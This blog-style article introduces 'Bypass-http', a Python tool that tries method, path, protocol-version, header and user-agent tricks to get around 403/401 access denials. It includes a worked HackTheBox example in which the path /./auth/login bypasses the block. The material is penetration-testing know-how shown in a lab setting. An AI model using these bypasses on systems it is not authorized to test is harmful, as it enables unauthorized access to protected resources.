.png)
9 months ago
74 BOOK THIS SPACE FOR AD
ARTICLE ADLink to the Github repo : here
Bypass-http is a python tool created to test multiples 403 & 401 bypass tricks on a target.
403 & 401 are errors threw by the server when you try to access unauthorized resources.
Unlike the above image, “Access Denied” errors are often on a particular path of the website, like website.com/admin (cf. example at the end of this article).
The most common path protection is to only permit white-listed IP addresses to access the content, the others IP got a 403 error.
Sometimes, 403 & 401 errors can be bypass, and you can still access the content of the page. Many tricks exist to achieve this, and the aim of this tool is to automatically run tests with these tricks.
Here are the tricks tested by Bypass-http now, note that the tool will be actualized and other tricks will be added / update in the future :
Testing all HTTP methodsSometimes the 403 rule is only set for GET requests, so the tool tries to send a request with a lot methods.
Path fuzzingThe most common and effective bypass method : trying to modify the access path in the request.
Downgrade protocol versionSometimes, changing the protocol version to an old one (for example HTTP/0.9) can cause unexpected behavior in the server and bypass the 403.
Headers fuzzingTesting to set some headers like ‘X-Forwarded-Host’ to certain value like ‘localhost’ can get around some server protection rules (especially the proxy here).
User-agent fuzzingThe tool will here try to downgrade / change the user-agent (the version of your browser) to cause unexpected behavior on the server. Indeed, some servers rules are not compatible with certain browsers / agents.
usage: bypass_http.py [-h] -i I -a A [-p P] [-v V] [-m M] [-s S]optional arguments:
-h, --help show this help message and exit
-i I IP of the target
-a A PATH of the target
-p P PORT of the target, 80 by default
-v V VERSION of the target, HTTPS/2.0 by default
-m M METHOD of the inital error, GET by default
-s S SECONDS between each request sent, 1 by default
To use this tool, you’ll need to enter the IP of the target (if you only have the DNS address, go to a DNS lookup online), and the path to the Access Denied error.
You can also modify the port of the target (80 by default), the protocol version of the target (HTTPS/2.0 by default), the HTTP method (GET by default) and the seconds between each requests (1 by default). Change the time between each request change will permit to avoid 429 too many requests sent error.
Keep in mind that the sockets requests will be sent from your IP.
After enter these information, you’ll need to enter the initial request headers in the default_headers.txt file. Don’t forget it !
For this example, ill use the HackTheBox challenge No-Threshold. In this challenge, the path /auth/login is forbidden and response with a 403 error.
Lets intercept the request with BurpSuite proxy interceptor to see the request.
We can see multiple information here :
HTTP method: GETProtocol version: HTTP/1.1IP: 94.237.62.195Port: 36517Defaults headers:Host: 94.237.62.195:36517User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Lets put the default headers in the default_headers.txt file :
Now lets run the tool (don’t forget to enter port and protocol version cause they are not equal to the defaults ones) :
python3 bypass_http.py -i 94.237.62.195 -a /auth/login -p 36517 -v HTTP/1.0After a minute of testing, we can see that the tool find something :
We can see that we got a 200 access authorized response with the following request :
GET /./auth/login HTTP/1.0Host: 94.237.62.195:36517
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
So by changing the path to /./auth/login in the request, we can bypass this 403.
Lets try it :
In fact, it’s working !
To see more about hacking, follow me on Twitter. Don’t hesitate if you have questions about the tool, or if you want to collaborate on it.
Bengali (Bangladesh) · 
English (United States) ·